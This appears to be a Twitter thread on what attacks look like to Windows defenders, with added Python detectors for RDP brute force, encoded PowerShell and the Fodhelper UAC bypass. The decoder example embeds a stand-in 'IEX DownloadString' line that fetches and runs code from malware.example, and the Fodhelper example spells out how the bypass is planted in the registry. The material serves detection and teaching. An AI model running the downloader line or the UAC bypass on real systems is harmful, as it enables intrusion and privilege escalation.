She's going to be talking about what adversary activity looks like. I've got plenty of screenshots from the attacker's perspective, but not much from the defenders' side of things
Windows perspective is ideal as most of her students are operating in that environment
Note the timestamps associated with the attempted login events. Here we see a successful online password brute-forcing attack against RDP. Closer inspection of the log data would reveal the successfully authenticated account and remote IP address. pic.twitter.com/zc3bXUgqBv
Funnily enough, I'm working on a list of logon event types to watch for. One of my usual indicators is attempts at Type 2 logon from service accounts, or interactive logon from workstation to workstation. Outside of Help Desk/IT, I consider it anomalous behavior in most places.
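The two detection ideas in this conversation, the timeline of failed-then-successful RDP logons from the first tweet and the logon-type anomalies from the reply, as one added Python example written for this page (it is not code from either poster). It runs over constructed sample records shaped like the fields of Security events 4624/4625 (EventID, TimeCreated, Computer, TargetUserName, LogonType, IpAddress, WorkstationName); the assumptions that service accounts carry a `svc_` prefix and workstations a `WS-` prefix, and the threshold of five failures in two minutes, are mine and need tuning to a real estate.

```python
"""Added example: triage Windows logon events for an online brute force against
RDP and for anomalous logon types. Sample records are constructed, not real logs."""
from collections import defaultdict
from datetime import datetime, timedelta

SERVICE_PREFIX = "svc_"      # assumption: naming convention for service accounts
WORKSTATION_PREFIX = "WS-"   # assumption: naming convention for workstation hosts


def ev(eid, ts, computer, user, logon_type, ip, workstation):
    """Build one constructed record with the 4624/4625 fields the logic needs."""
    return {"EventID": eid, "TimeCreated": ts, "Computer": computer,
            "TargetUserName": user, "LogonType": logon_type,
            "IpAddress": ip, "WorkstationName": workstation}


SAMPLE_EVENTS = [
    # Online brute force against RDP with NLA: failures log as 4625 a few seconds
    # apart, then a 4624 with LogonType 10 (RemoteInteractive) from the same IP.
    ev(4625, "2020-01-29T02:14:01", "SRV-TS01", "administrator", 3, "203.0.113.45", "-"),
    ev(4625, "2020-01-29T02:14:08", "SRV-TS01", "administrator", 3, "203.0.113.45", "-"),
    ev(4625, "2020-01-29T02:14:15", "SRV-TS01", "administrator", 3, "203.0.113.45", "-"),
    ev(4625, "2020-01-29T02:14:22", "SRV-TS01", "administrator", 3, "203.0.113.45", "-"),
    ev(4625, "2020-01-29T02:14:29", "SRV-TS01", "administrator", 3, "203.0.113.45", "-"),
    ev(4624, "2020-01-29T02:14:36", "SRV-TS01", "administrator", 10, "203.0.113.45", "KALI"),
    # One typo followed by a normal console logon: not a brute force.
    ev(4625, "2020-01-29T07:59:50", "WS-0099", "jdoe", 2, "-", "WS-0099"),
    ev(4624, "2020-01-29T08:00:05", "WS-0099", "jdoe", 2, "-", "WS-0099"),
    # Service account logging on interactively at a workstation console.
    ev(4624, "2020-01-29T08:02:10", "WS-0412", "svc_backup", 2, "-", "WS-0412"),
    # RDP straight from one workstation to another.
    ev(4624, "2020-01-29T08:30:00", "WS-0099", "jdoe", 10, "10.0.5.17", "WS-0412"),
    # RDP from a help-desk host: expected, so not flagged.
    ev(4624, "2020-01-29T08:31:00", "WS-0099", "helpdesk1", 10, "10.0.9.4", "IT-HD01"),
    # Service account doing a service logon (Type 5): expected.
    ev(4624, "2020-01-29T09:00:00", "SRV-DB01", "svc_sql", 5, "-", "-"),
]


def event_time(e):
    return datetime.fromisoformat(e["TimeCreated"])


def find_brute_force(events, threshold=5, window=timedelta(minutes=2)):
    """Flag each 4624 preceded by at least `threshold` 4625s from the same
    source IP inside `window`. The failures' LogonType is deliberately ignored:
    with NLA the failures are Type 3 while the success is Type 10."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=event_time):
        by_ip[e["IpAddress"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        for i, e in enumerate(evs):
            if e["EventID"] != 4624:
                continue
            t = event_time(e)
            failures = [f for f in evs[:i]
                        if f["EventID"] == 4625 and t - event_time(f) <= window]
            if len(failures) >= threshold:
                alerts.append({"rule": "online_bruteforce", "ip": ip,
                               "account": e["TargetUserName"], "host": e["Computer"],
                               "logon_type": e["LogonType"], "failures": len(failures),
                               "first_failure": failures[0]["TimeCreated"],
                               "success": e["TimeCreated"]})
    return alerts


def find_anomalous_logon_types(events):
    """Flag Type 2 (Interactive) logons by service accounts and Type 10
    (RemoteInteractive) logons whose source and target are both workstations."""
    alerts = []
    for e in events:
        if e["EventID"] != 4624:
            continue
        user, src, dst = e["TargetUserName"], e["WorkstationName"], e["Computer"]
        if e["LogonType"] == 2 and user.lower().startswith(SERVICE_PREFIX):
            alerts.append({"rule": "service_account_interactive", "account": user,
                           "host": dst, "time": e["TimeCreated"]})
        elif (e["LogonType"] == 10 and src.upper().startswith(WORKSTATION_PREFIX)
              and dst.upper().startswith(WORKSTATION_PREFIX)):
            alerts.append({"rule": "workstation_to_workstation_rdp", "account": user,
                           "source": src, "host": dst, "time": e["TimeCreated"]})
    return alerts


if __name__ == "__main__":
    for alert in find_brute_force(SAMPLE_EVENTS) + find_anomalous_logon_types(SAMPLE_EVENTS):
        print(alert)
```

The brute-force rule keys on the remote IP rather than the account so that a spray across many accounts from one source is still caught; the logon-type rule keys on naming conventions, which is exactly the part that has to be adapted per environment before it is useful.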
Does Emotet being executed on a user's machine count? This has actually become an interview question (showing the PowerShell encoded command) to see how an analyst would figure out what's happening (basically asking that they understand they need to decode a base64 hash). pic.twitter.com/js6aXE5beD
That's a good one. Funnily enough, I was just digging through some of my encoded payloads looking for a good "If you see this, shit's happening" example.
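The decode step the interview question above asks for, as an added Python example written for this page (not the poster's payload or screenshot). What `powershell -EncodedCommand` carries is Base64 over the UTF-16LE bytes of the script, not a hash, so the decode is FromBase64 followed by a UTF-16LE decode. The command line it triages is constructed here by encoding a stand-in downloader one-liner pointing at a reserved `.example` host; real Emotet stages are longer and heavily obfuscated. The flag list and cradle patterns are my own starting set, not a complete signature.

```python
"""Added example: decode a PowerShell -EncodedCommand argument and pull out the
bits an analyst reports first. The sample command line is constructed."""
import base64
import re


def encode_command(script):
    """Produce what -EncodedCommand expects; used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for a downloader stage (reserved .example host, not a real C2).
SAMPLE_SCRIPT = "$u='http://malware.example/x.bin';IEX (New-Object Net.WebClient).DownloadString($u)"
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -NonI -ep bypass -enc "
                  + encode_command(SAMPLE_SCRIPT))

# PowerShell accepts any unambiguous prefix of -EncodedCommand (and -ec);
# these are the spellings seen most often in the wild.
ENC_FLAG = re.compile(r"(?i)\s-(?:ec|e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
SUSPICIOUS_FLAGS = ("-nop", "-w hidden", "-noni", "-ep bypass", "-enc")
DOWNLOAD_CRADLE = re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|IEX|Invoke-Expression")
URL = re.compile(r"https?://[^\s'\"]+")


def decode_encoded_command(cmdline):
    """Return the decoded script, or None when no encoded-command argument is present."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)   # tolerate padding stripped by a log pipeline
    return base64.b64decode(b64).decode("utf-16-le")


def triage(cmdline):
    """Summarise a process command line: suspicious flags, decoded script,
    download/execute primitives and URLs found in it."""
    script = decode_encoded_command(cmdline)
    low = cmdline.lower()
    return {
        "flags": [f for f in SUSPICIOUS_FLAGS if f in low],
        "script": script,
        "cradle": sorted(set(DOWNLOAD_CRADLE.findall(script or ""))),
        "urls": URL.findall(script or ""),
    }


if __name__ == "__main__":
    # "ZABpAHIA" is the encoding of "dir": small enough to verify by hand.
    print(decode_encoded_command("powershell -e ZABpAHIA"))
    print(triage(SAMPLE_CMDLINE))
```

Usage note: in a SIEM this runs over Sysmon Event ID 1 or Security 4688 command lines; once decoded, the script often contains a second Base64 layer or a `-join`/`[char]` construction, so the decode function is the first step, not the last.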
http://lockboxx.blogspot.com/2018/02/tamuctf-18-writeup-hso.html … Random writeup from an old CTF. Not my writeup, so I can't grant permission if that's a factor.
Does a home user count? https://mobile.twitter.com/voltagex/status/1222384198935183362 …
Here is what a Windows 10 Fodhelper UAC bypass looks like. The payload tries to launch multiple Meterpreter stagers and then, when it succeeds, does the UAC bypass. The data is from my test environment, since I obviously can't share customer data. pic.twitter.com/qXOOLCHnfO
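The defender's view of the Fodhelper bypass in that screenshot, as an added Python example written for this page (not the poster's data or tooling). The technique plants a command under the current user's `HKCU\Software\Classes\ms-settings\Shell\Open\command` key (plus an empty `DelegateExecute` value) and then runs the auto-elevating `fodhelper.exe`, which executes that command at high integrity. That gives two observables Sysmon records: a registry value set (Event ID 13) on that key, and a process create (Event ID 1) with `fodhelper.exe` as the parent. The records below are constructed stand-ins carrying only the fields the logic needs; the field names follow Sysmon's but the events, SID, user and paths are invented for the example, and the list of "shell-like" children is my assumption to tune.

```python
"""Added example: detect the Fodhelper UAC bypass from Sysmon-style registry
and process-creation records. All sample events are constructed."""
import re
from datetime import datetime, timedelta

# The ms-settings protocol handler fodhelper.exe resolves; Sysmon logs HKCU as HKU\<SID>.
MS_SETTINGS_CMD = re.compile(r"(?i)\\Software\\Classes\\ms-settings\\Shell\\Open\\command")
# Children nobody expects fodhelper.exe to spawn (assumption: adjust to your estate).
SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe",
                    "regsvr32.exe", "mshta.exe", "wscript.exe"}


def reg_set(ts, user, target, details):
    """Constructed Sysmon Event ID 13 (registry value set) record."""
    return {"EventID": 13, "UtcTime": ts, "User": user,
            "TargetObject": target, "Details": details}


def proc_create(ts, user, image, parent, cmdline, integrity):
    """Constructed Sysmon Event ID 1 (process create) record."""
    return {"EventID": 1, "UtcTime": ts, "User": user, "Image": image,
            "ParentImage": parent, "CommandLine": cmdline, "IntegrityLevel": integrity}


HIVE = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"  # constructed SID
SAMPLE_EVENTS = [
    proc_create("2020-01-29T14:00:01", "LAB\\alice", r"C:\Windows\System32\notepad.exe",
                r"C:\Windows\explorer.exe", "notepad.exe", "Medium"),
    reg_set("2020-01-29T14:02:10", "LAB\\alice",
            HIVE + r"\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute", ""),
    reg_set("2020-01-29T14:02:10", "LAB\\alice",
            HIVE + r"\Software\Classes\ms-settings\Shell\Open\command\(Default)",
            r"C:\Windows\System32\cmd.exe /c C:\Users\alice\AppData\Local\Temp\stager.exe"),
    proc_create("2020-01-29T14:02:12", "LAB\\alice", r"C:\Windows\System32\fodhelper.exe",
                r"C:\Users\alice\AppData\Local\Temp\stager.exe", "fodhelper.exe", "High"),
    proc_create("2020-01-29T14:02:13", "LAB\\alice", r"C:\Windows\System32\cmd.exe",
                r"C:\Windows\System32\fodhelper.exe",
                r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\stager.exe", "High"),
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_fodhelper(events, window=timedelta(minutes=5)):
    """Return alerts for (1) any write to the ms-settings handler in a user hive,
    which legitimate software does not do, and (2) fodhelper.exe spawning a
    shell-like child, correlated with a recent plant by the same user."""
    alerts, plants = [], []
    for e in events:
        if e["EventID"] == 13 and MS_SETTINGS_CMD.search(e["TargetObject"]):
            plants.append(e)
            alerts.append({"rule": "ms_settings_handler_planted", "user": e["User"],
                           "value": e["TargetObject"].rsplit("\\", 1)[-1],
                           "command": e["Details"], "time": e["UtcTime"]})
    for e in events:
        if e["EventID"] != 1 or image_name(e["ParentImage"]) != "fodhelper.exe":
            continue
        if image_name(e["Image"]) not in SUSPECT_CHILDREN:
            continue
        t = datetime.fromisoformat(e["UtcTime"])
        related = [p for p in plants if p["User"] == e["User"]
                   and timedelta(0) <= t - datetime.fromisoformat(p["UtcTime"]) <= window]
        alerts.append({"rule": "fodhelper_spawned_shell", "user": e["User"],
                       "child": e["CommandLine"], "integrity": e["IntegrityLevel"],
                       "planted_before": bool(related), "time": e["UtcTime"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_fodhelper(SAMPLE_EVENTS):
        print(alert)
```

The registry rule is the one worth paging on by itself; the process rule mostly adds context (what ran, at what integrity, and whether the plant preceded it), and the integrity level in the child event is the clearest evidence that the bypass actually worked.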